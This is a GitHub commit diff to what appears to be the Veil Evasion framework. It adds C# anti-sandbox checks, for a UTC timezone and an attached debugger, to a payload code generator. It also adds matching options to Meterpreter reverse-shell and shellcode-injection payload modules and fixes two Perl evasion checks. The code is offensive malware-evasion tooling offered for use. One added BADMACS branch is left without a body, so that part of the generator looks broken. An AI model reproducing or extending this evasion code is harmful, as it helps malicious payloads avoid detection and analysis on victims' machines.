Skip to content

Commit

Permalink
added CS
Browse files Browse the repository at this point in the history
  • Loading branch information
@ChrisTruncer
ChrisTruncer committed Jul 23, 2017
1 parent 96a0765 commit a5cbee0
Show file tree
Hide file tree
Showing 6 changed files with 29 additions and 2 deletions.
21 changes: 19 additions & 2 deletions Tools/Evasion/evasion_common/gamemaker.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -449,7 +449,7 @@ def senecas_games(evasion_payload):
check_code += '\t' * num_tabs_required + 'my $' + min_disksize + ' = ' + evasion_payload.required_options['DISKSIZE'][0] + ';\n'
check_code += '\t' * num_tabs_required + 'my $' + file_object + ' = Win32::OLE->CreateObject("Scripting.FileSystemObject");\n'
check_code += '\t' * num_tabs_required + 'my $' + real_disksize + ' = $' + file_object + '->GetDrive("C:")->{TotalSize}/1073741824.0;\n'
check_code += '\t' * num_tabs_required + 'if ($' + min_disksize + ' > $' + real_disksize + ') {\n'
check_code += '\t' * num_tabs_required + 'if ($' + min_disksize + ' < $' + real_disksize + ') {\n'

# Add a tab for this check
num_tabs_required += 1
Expand Down Expand Up @@ -494,7 +494,7 @@ def senecas_games(evasion_payload):
check_code += '\t' * num_tabs_required + 'my $' + perl_wmi + ' = Win32::OLE->GetObject("winmgmts:\\\\\\\\localhost\\\\root\\\\CIMV2") or die;\n'
check_code += '\t' * num_tabs_required + 'my $' + reg_dump + ' = $' + perl_wmi + '->ExecQuery("SELECT CurrentSize from Win32_Registry") or die;\n'
check_code += '\t' * num_tabs_required + 'my $' + reg_size + ';\n'
check_code += '\t' * num_tabs_required + 'foreach my $' + perl_reg_obj + ' (in $' + reg_dump + ') { $' + reg_size + ' = $regObj->CurrentSize; }\n'
check_code += '\t' * num_tabs_required + 'foreach my $' + perl_reg_obj + ' (in $' + reg_dump + ') { $' + reg_size + ' = $' + perl_reg_obj + '->CurrentSize; }\n'
check_code += '\t' * num_tabs_required + 'if ($' + reg_size + ' > $' + reg_mb_size + ') {\n'

# Add a tab for this check
Expand Down Expand Up @@ -694,6 +694,23 @@ def senecas_games(evasion_payload):

# Add a tab for this check
num_tabs_required += 1

if evasion_payload.required_options["TIMEZONE"][0].lower() != 'x':

check_code += '\t' * num_tabs_required + 'if (TimeZone.CurrentTimeZone.StandardName != "Coordinated Universal Time") {\n'

# Add a tab for this check
num_tabs_required += 1

if evasion_payload.required_options["DEBUGGER"][0].lower() != 'x':

check_code += '\t' * num_tabs_required + 'if (!System.Diagnostics.Debugger.IsAttached) {\n'

# Add a tab for this check
num_tabs_required += 1

if evasion_payload.required_options["BADMACS"][0].lower() != 'x':


if evasion_payload.required_options["DOMAIN"][0].lower() != "x":

Expand Down
2 changes: 2 additions & 0 deletions Tools/Evasion/payloads/cs/meterpreter/rev_http.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -46,6 +46,8 @@ def __init__(self, cli_obj):
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"TIMEZONE" : ["X", "Optional: Check to validate not in UTC"],
"DEBUGGER" : ["X", "Optional: Check if debugger is attached"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}

Expand Down
2 changes: 2 additions & 0 deletions Tools/Evasion/payloads/cs/meterpreter/rev_https.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -46,6 +46,8 @@ def __init__(self, cli_obj):
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"TIMEZONE" : ["X", "Optional: Check to validate not in UTC"],
"DEBUGGER" : ["X", "Optional: Check if debugger is attached"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}

Expand Down
2 changes: 2 additions & 0 deletions Tools/Evasion/payloads/cs/meterpreter/rev_tcp.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -45,6 +45,8 @@ def __init__(self, cli_obj):
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"TIMEZONE" : ["X", "Optional: Check to validate not in UTC"],
"DEBUGGER" : ["X", "Optional: Check if debugger is attached"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}

Expand Down
2 changes: 2 additions & 0 deletions Tools/Evasion/payloads/cs/shellcode_inject/base64.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -49,6 +49,8 @@ def __init__(self, cli_obj):
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"TIMEZONE" : ["X", "Optional: Check to validate not in UTC"],
"DEBUGGER" : ["X", "Optional: Check if debugger is attached"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}

Expand Down
2 changes: 2 additions & 0 deletions Tools/Evasion/payloads/cs/shellcode_inject/virtual.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -48,6 +48,8 @@ def __init__(self, cli_obj):
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"TIMEZONE" : ["X", "Optional: Check to validate not in UTC"],
"DEBUGGER" : ["X", "Optional: Check if debugger is attached"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}

Expand Down

0 comments on commit a5cbee0

Please sign in to comment.